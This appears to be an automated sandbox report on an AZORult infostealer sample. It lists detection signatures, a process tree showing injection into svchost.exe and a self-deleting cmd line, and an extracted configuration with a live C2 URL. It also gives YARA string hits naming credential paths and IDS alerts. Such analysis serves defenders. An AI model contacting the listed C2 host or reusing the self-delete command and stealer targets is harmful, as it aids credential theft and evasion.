Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4QihT6CwD8.exe

Overview

General Information

Sample name:4QihT6CwD8.exe
renamed because original name is a hash value
Original sample name:45DA35E12BE2E8A17E6ACF41F682C7F9.exe
Analysis ID:1501433
MD5:45da35e12be2e8a17e6acf41f682c7f9
SHA1:cdaccd6ed6bbc405666a5d06a9001d116153f56b
SHA256:4a0dc5e1271e90a5fa81a2b042bb1b6f3eaef6159a8a3b07c563a8ca90fa7a74
Tags:AZORultexe
Infos:

Detection

Azorult
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Azorult
Yara detected Azorult Info Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4QihT6CwD8.exe (PID: 4180 cmdline: "C:\Users\user\Desktop\4QihT6CwD8.exe" MD5: 45DA35E12BE2E8A17E6ACF41F682C7F9)
    • svchost.exe (PID: 5180 cmdline: "C:\Users\user\Desktop\4QihT6CwD8.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • cmd.exe (PID: 5548 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 4888 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AzorultAZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://ln6b9.shop/LN341/index.php"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Azorult_38fce9eaunknownunknown
      • 0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
      • 0xd778:$a2: %APPDATA%\.purple\accounts.xml
      • 0xdec0:$a3: %TEMP%\curbuf.dat
      • 0x1a1d4:$a4: PasswordsList.txt
      • 0x151d8:$a5: Software\Valve\Steam
      00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpAzorult_1Azorult Payloadkevoreilly
      • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
      • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
      00000001.00000002.1774295463.0000000000400000.00000040.80000000.00040000.00000000.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
      • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x1a360:$v2: http://ip-api.com/json
      • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.4QihT6CwD8.exe.1160000.1.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        0.2.4QihT6CwD8.exe.1160000.1.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          0.2.4QihT6CwD8.exe.1160000.1.unpackWindows_Trojan_Azorult_38fce9eaunknownunknown
          • 0x18c50:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
          • 0xbf78:$a2: %APPDATA%\.purple\accounts.xml
          • 0xc6c0:$a3: %TEMP%\curbuf.dat
          • 0x189d4:$a4: PasswordsList.txt
          • 0x139d8:$a5: Software\Valve\Steam
          0.2.4QihT6CwD8.exe.1160000.1.unpackAzorult_1Azorult Payloadkevoreilly
          • 0x17078:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
          • 0x114ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
          0.2.4QihT6CwD8.exe.1160000.1.unpackAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
          • 0x16e18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x17478:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x18b60:$v2: http://ip-api.com/json
          • 0x177d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
          Click to see the 21 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\4QihT6CwD8.exe", CommandLine: "C:\Users\user\Desktop\4QihT6CwD8.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\4QihT6CwD8.exe", ParentImage: C:\Users\user\Desktop\4QihT6CwD8.exe, ParentProcessId: 4180, ParentProcessName: 4QihT6CwD8.exe, ProcessCommandLine: "C:\Users\user\Desktop\4QihT6CwD8.exe", ProcessId: 5180, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\4QihT6CwD8.exe", CommandLine: "C:\Users\user\Desktop\4QihT6CwD8.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\4QihT6CwD8.exe", ParentImage: C:\Users\user\Desktop\4QihT6CwD8.exe, ParentProcessId: 4180, ParentProcessName: 4QihT6CwD8.exe, ProcessCommandLine: "C:\Users\user\Desktop\4QihT6CwD8.exe", ProcessId: 5180, ProcessName: svchost.exe

          Suricata Signatures

          Timestamp:2024-08-29T22:46:59.502352+0200
          SID:2029467
          Severity:1
          Source Port:49730
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-29T22:47:07.607647+0200
          SID:2029467
          Severity:1
          Source Port:49731
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-29T22:46:59.753049+0200
          SID:2029136
          Severity:1
          Source Port:80
          Destination Port:49730
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://ln6b9.shop/LN341/index.phpAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000000.00000002.1674725179.0000000001160000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Azorult {"C2 url": "http://ln6b9.shop/LN341/index.php"}
          Multi AV Scanner detection for submitted file
          Source: 4QihT6CwD8.exeReversingLabs: Detection: 60%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: 4QihT6CwD8.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004094C4 CryptUnprotectData,LocalFree,1_2_004094C4
          Source: 4QihT6CwD8.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr
          Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
          Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.1.dr
          Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
          Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.1.dr
          Source: Binary string: wntdll.pdb source: 4QihT6CwD8.exe, 00000000.00000003.1669238946.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, 4QihT6CwD8.exe, 00000000.00000003.1673939585.0000000003A40000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.1.dr
          Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
          Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.1.dr
          Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.1.dr
          Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
          Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
          Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.1.dr
          Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
          Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.1.dr
          Source: Binary string: wntdll.pdbUGP source: 4QihT6CwD8.exe, 00000000.00000003.1669238946.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, 4QihT6CwD8.exe, 00000000.00000003.1673939585.0000000003A40000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr
          Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.1.dr
          Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.1.dr
          Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.1.dr
          Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr
          Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.1.dr
          Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
          Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1775549667.00000000067E0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
          Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
          Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1775484203.00000000066D4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_003BDBBE
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C68EE FindFirstFileW,FindClose,0_2_003C68EE
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003C698F
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003BD076
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003BD3A9
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003C9642
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003C979D
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003C9B2B
          Source: C:\Users\user\Desktop\4QihT6CwD8.exeCode function: 0_2_003C5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003C5C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,1_2_004098A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D0A0 FindFirstFileW,1_2_0040D0A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,1_2_004087DC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D06E FindFirstFileW,1_2_0040D06E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose,1_2_0041303C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose,1_2_0040989F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,1_2_004111C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D3C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose,1_2_0041158C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose,1_2_00411590
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,1_2_00412D9C

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49730 -> 104.21.2.6:80
          Source: Network trafficSuricata IDS: 2029136 - Severity 1 - ET MALWARE AZORult v3.3 Server Response M1 : 104.21.2.6:80 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.4:49731 -> 104.21.2.6:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.2.6 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://ln6b9.shop/LN341/index.php
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
